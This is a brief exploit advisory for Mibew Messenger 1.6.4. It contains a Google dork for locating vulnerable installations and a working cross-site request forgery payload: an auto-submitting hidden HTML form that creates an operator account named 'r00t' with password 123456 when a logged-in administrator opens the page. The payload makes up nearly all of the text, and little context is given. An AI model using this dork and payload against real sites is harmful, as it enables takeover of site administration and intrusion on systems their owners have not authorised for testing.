# Version 1.6.4
# Dork: intext:"(c) 2011-2013 mibew.org"
Introduction
------------
Mibew is a open-source support system CMS easily incorporated in any website.
Exploit
-------
1 2<body onload="document.forms[0].submit();"> 3 <form name="agentForm" method="post" action="http://pentest.lan/webim/operator/operator.php"> 4 <input name="opid" value="" type="hidden"> 5 <input name="login" size="40" value="r00t" class="formauth" type="hidden" > 6 <input name="email" size="40" value="r00t@t00r.tr" class="formauth" type="hidden"> 7 <input name="password" size="40" value="123456" class="formauth" type="hidden"> 8 <input name="passwordConfirm" size="40" value="123456" class="formauth" type="hidden"> 9 <input name="name" size="40" value="r00t" class="formauth" type="hidden"> 10 <input name="commonname" size="40" value="ruts" class="formauth" type="hidden"> 11 </form> 12</body>
Groucho